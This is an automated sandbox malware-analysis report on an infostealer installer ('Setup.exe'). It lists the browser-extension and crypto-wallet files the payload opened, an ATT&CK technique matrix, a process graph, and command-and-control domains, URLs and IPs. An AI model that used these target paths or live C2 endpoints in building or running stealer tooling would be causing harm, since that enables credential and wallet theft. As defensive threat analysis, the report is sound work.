            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: Contrast.comBinary or memory string: WIN_81
            Source: Contrast.comBinary or memory string: WIN_XP
            Source: Contrast.comBinary or memory string: WIN_XPe
            Source: Contrast.comBinary or memory string: WIN_VISTA
            Source: Contrast.comBinary or memory string: WIN_7
            Source: Contrast.comBinary or memory string: WIN_8
            Source: Set.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
            Source: Yara matchFile source: 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Contrast.com PID: 6180, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0058696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_0058696E
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00586E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00586E32
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            21
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            2
            Valid Accounts
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol31
            Data from Local System
            2
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
            Valid Accounts
            2
            Obfuscated Files or Information
            Security Account Manager13
            File and Directory Discovery
            SMB/Windows Admin Shares21
            Input Capture
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
            Access Token Manipulation
            1
            DLL Side-Loading
            NTDS37
            System Information Discovery
            Distributed Component Object Model3
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
            Process Injection
            11
            Masquerading
            LSA Secrets141
            Security Software Discovery
            SSHKeylogging114
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Valid Accounts
            Cached Domain Credentials121
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
            Virtualization/Sandbox Evasion
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565284 Sample: 'Setup.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 51 pastebin.com 2->51 53 snowqueen.site 2->53 55 5 other IPs or domains 2->55 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 65 9 other signatures 2->65 10 'Setup.exe 19 2->10         started        signatures3 63 Connects to a pastebin service (likely for C&C) 51->63 process4 file5 41 C:\Users\user\AppData\Local\Temp\Set, COM 10->41 dropped 13 cmd.exe 3 10->13         started        process6 file7 43 C:\Users\user\AppData\Local\...\Contrast.com, PE32 13->43 dropped 79 Drops PE files with a suspicious file extension 13->79 17 Contrast.com 2 13->17         started        22 cmd.exe 2 13->22         started        24 conhost.exe 13->24         started        26 6 other processes 13->26 signatures8 process9 dnsIp10 45 lumdexibuy.shop 104.21.63.229, 443, 49754, 49764 CLOUDFLARENETUS United States 17->45 47 pastebin.com 104.20.4.235, 443, 49848 CLOUDFLARENETUS United States 17->47 49 silversky.club 104.21.58.9, 443, 49854 CLOUDFLARENETUS United States 17->49 39 C:\Users\...\VKLM5S46YTD8XS7X69X8S6283E.ps1, ASCII 17->39 dropped 67 Query firmware table information (likely to detect VMs) 17->67 69 Found many strings related to Crypto-Wallets (likely being stolen) 17->69 71 Tries to harvest and steal browser information (history, passwords, etc) 17->71 73 Tries to steal Crypto Currency Wallets 17->73 28 powershell.exe 25 17->28         started        31 powershell.exe 15 15 17->31         started        file11 signatures12 process13 signatures14 75 Found many strings related to Crypto-Wallets (likely being stolen) 28->75 77 Loading BitLocker PowerShell Module 28->77 33 WmiPrvSE.exe 28->33         started        35 conhost.exe 28->35         started        37 conhost.exe 31->37         started        process15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            'Setup.exe13%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\108941\Contrast.com3%ReversingLabs
            C:\Users\user\AppData\Local\Temp\Set0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://..queen.0%Avira URL Cloudsafe
            https://lumdexibuy.shop/ms0%Avira URL Cloudsafe
            https://lumdexibuy.shop/api0%Avira URL Cloudsafe
            https://lumdexibuy.shop/(0%Avira URL Cloudsafe
            https://go.microsofDz0%Avira URL Cloudsafe
            lumdexibuy.shop0%Avira URL Cloudsafe
            https://snowqueen.site/calling.php?compName=0%Avira URL Cloudsafe
            https://go.microsofD0%Avira URL Cloudsafe
            http://crl.microsofth0%Avira URL Cloudsafe
            https://silversky.club/4b882c8/script100%Avira URL Cloudmalware
            https://snowqueen.site/calling.php?compName=user-PC0%Avira URL Cloudsafe
            https://lumdexibuy.shop/e0%Avira URL Cloudsafe
            https://snowqueen.site0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            silversky.club
            104.21.58.9
            truefalse
              high
              pastebin.com
              104.20.4.235
              truefalse
                high
                lumdexibuy.shop
                104.21.63.229
                truetrue
                  unknown
                  cdn1.pixel-story.shop
                  unknown
                  unknownfalse
                    high
                    snowqueen.site
                    unknown
                    unknowntrue
                      unknown
                      GJNYzyvbesUVEaJQoujpar.GJNYzyvbesUVEaJQoujpar
                      unknown
                      unknowntrue
                        unknown
                        masa.r2cloudzugybyi8.shop
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://lumdexibuy.shop/apitrue
                          • Avira URL Cloud: safe
                          unknown
                          https://pastebin.com/raw/erLX7UsTfalse
                            high
                            https://silversky.club/4b882c8/scriptfalse
                            • Avira URL Cloud: malware
                            unknown
                            lumdexibuy.shoptrue
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabContrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/ac/?q=Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.entrust.net03'Setup.exefalse
                                  high
                                  http://ocsp.entrust.net02'Setup.exefalse
                                    high
                                    https://contoso.com/Licensepowershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://snowqueen.site/calling.php?compName=powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, 5TM3JMZQCYKEYRKL75T8.ps1.10.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.autoitscript.com/autoit3/Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drfalse
                                          high
                                          https://go.microsofDpowershell.exe, 0000000E.00000002.2848592531.00000000004C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://..queen.powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://lumdexibuy.shop/msContrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://x1.c.lencr.org/0Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://x1.i.lencr.org/0Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchContrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.2854486695.000000000567D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crl.entrust.net/ts1ca.crl0'Setup.exefalse
                                                      high
                                                      https://support.mozilla.org/products/firefoxgro.allContrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.2849993578.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2869363357.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://lumdexibuy.shop/(Contrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.autoitscript.com/autoit3/JContrast.com, 0000000A.00000000.2061244784.00000000005D9000.00000002.00000001.01000000.00000007.sdmp, Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drfalse
                                                            high
                                                            http://nuget.org/NuGet.exepowershell.exe, 0000000E.00000002.2854486695.000000000567D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://go.microsofDzpowershell.exe, 0000000E.00000002.2848592531.00000000004C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoContrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.2849993578.0000000004776000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://go.micropowershell.exe, 00000011.00000002.2869363357.00000000055BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.entrust.net/rpa03'Setup.exefalse
                                                                          high
                                                                          https://contoso.com/Iconpowershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://aia.entrust.net/ts1-chain256.cer01'Setup.exefalse
                                                                              high
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ocsp.rootca1.amazontrust.com0:Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://nsis.sf.net/NSIS_ErrorError'Setup.exefalse
                                                                                      high
                                                                                      https://www.ecosia.org/newtab/Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brContrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://aka.ms/pscore6lBsqpowershell.exe, 0000000E.00000002.2849993578.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2869363357.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ac.ecosia.org/autocomplete?q=Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.microsofthpowershell.exe, 0000000E.00000002.2858459966.0000000006DB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.2849993578.0000000004776000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://snowqueen.sitepowershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://lumdexibuy.shop/eContrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://snowqueen.site/calling.php?compName=user-PCpowershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.entrust.net/2048ca.crl0'Setup.exefalse
                                                                                                        high
                                                                                                        https://www.entrust.net/rpa0'Setup.exefalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.20.4.235
                                                                                                          pastebin.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          104.21.63.229
                                                                                                          lumdexibuy.shopUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          104.21.58.9
                                                                                                          silversky.clubUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1565284
                                                                                                          Start date and time:2024-11-29 15:11:06 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 7m 13s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:19
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:'Setup.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@27/22@7/3
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 50%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 82
                                                                                                          • Number of non-executed functions: 312
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3500 because it is empty
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 980 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: 'Setup.exe
                                                                                                          TimeTypeDescription
                                                                                                          09:11:54API Interceptor1x Sleep call for process: 'Setup.exe modified
                                                                                                          09:12:00API Interceptor12x Sleep call for process: Contrast.com modified
                                                                                                          09:13:15API Interceptor24x Sleep call for process: powershell.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          104.20.4.235gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • pastebin.com/raw/sA04Mwk2
                                                                                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • pastebin.com/raw/sA04Mwk2
                                                                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                          • pastebin.com/raw/sA04Mwk2
                                                                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                          • pastebin.com/raw/sA04Mwk2
                                                                                                          gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • pastebin.com/raw/sA04Mwk2
                                                                                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • pastebin.com/raw/sA04Mwk2
                                                                                                          sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                          • pastebin.com/raw/V9y5Q5vv
                                                                                                          sostener.vbsGet hashmaliciousXWormBrowse
                                                                                                          • pastebin.com/raw/V9y5Q5vv
                                                                                                          envifa.vbsGet hashmaliciousRemcosBrowse
                                                                                                          • pastebin.com/raw/V9y5Q5vv
                                                                                                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                                                          • pastebin.com/raw/NsQ5qTHr
                                                                                                          104.21.63.229http://cabonusoffer.com/track/Get hashmaliciousUnknownBrowse
                                                                                                            104.21.58.9Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              SeT_up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  pastebin.comsegura.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.20.3.235
                                                                                                                  DHL-SHIPMENT-DOCUMENT-BILL-OF-LADING-PACKING-LIST.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                  • 172.67.19.24
                                                                                                                  Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                                                  • 104.20.4.235
                                                                                                                  https://pastebin.com/raw/0v6VhvpbGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.20.4.235
                                                                                                                  saiya.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                  • 172.67.19.24
                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                  • 104.20.3.235
                                                                                                                  SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.20.3.235
                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.20.3.235
                                                                                                                  17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                                  • 104.20.3.235
                                                                                                                  SeT_up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.20.4.235
                                                                                                                  silversky.clubSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  SeT_up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.167.196
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUS!SET__UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.187.171
